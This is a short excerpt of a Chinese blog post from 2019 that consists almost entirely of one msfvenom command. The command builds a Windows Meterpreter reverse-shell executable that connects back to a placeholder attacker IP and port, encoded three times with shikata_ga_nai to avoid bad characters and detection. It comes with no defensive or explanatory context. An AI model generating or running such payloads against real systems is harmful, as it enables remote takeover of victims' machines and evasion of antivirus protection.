---------------------
摘要: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe 阅读全文
posted @ 2019-12-23 20:28 豆沙包的沙 阅读(887) 评论(0) 推荐(0) 编辑